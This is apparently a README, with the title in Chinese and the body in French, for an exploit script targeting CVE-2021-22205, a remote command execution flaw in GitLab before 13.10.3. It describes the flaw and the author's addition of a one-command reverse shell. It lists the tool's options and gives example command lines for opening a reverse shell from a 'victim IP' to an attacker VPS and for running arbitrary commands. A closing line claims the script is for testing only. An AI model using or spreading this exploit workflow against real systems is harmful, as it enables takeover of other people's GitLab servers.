
CVE-2021-22205 检测脚本,支持getshell和命令执行
En raison d'une validation incorrecte des fichiers image transmis à l'analyseur de fichiers par Gitlab, une exécution de commandes est possible. Un attaquant peut construire une requête malveillante pour exécuter des commandes arbitraires sur le système cible, ce qui conduit finalement au contrôle du serveur Gitlab. Comme la plupart des scripts disponibles en ligne ne proposent pas de reverse shell, j'ai modifié le script existant pour ajouter une fonctionnalité de reverse shell en une seule commande.
______ _______ ____ ___ ____ _ ____ ____ ____ ___ ____
/ ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \|___ \|___ \ / _ \| ___|
| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
\____ | \_/ |_____| |_____|\___/_____|_| |_____|_____|_____|\___/|____/
usage: CVE-2021-22205.py [-h] [-t TARGET] [-c COMMAND] [--shell] [-i IP]
[-p PORT]
GitLab < 13.10.3 RCE
optional arguments:
-h, --help affiche ce message d'aide et quitte
-t TARGET, --target TARGET
URL cible
-c COMMAND, --command COMMAND
Commande à exécuter
--shell Reverse shell (oui/non)
-i IP, --ip IP Adresse IP pour le reverse shell
-p PORT, --port PORT Port pour le reverse shell
python3 CVE-2021-22205.py -t [IP de la victime] --shell -i [IP du VPS] -p [port du VPS] // reverse shell
python3 CVE-2021-22205.py -t [IP de la victime] -c [commande] // exécution de commande
Ce script est destiné à des fins de test uniquement, ne l'utilisez pas à d'autres fins.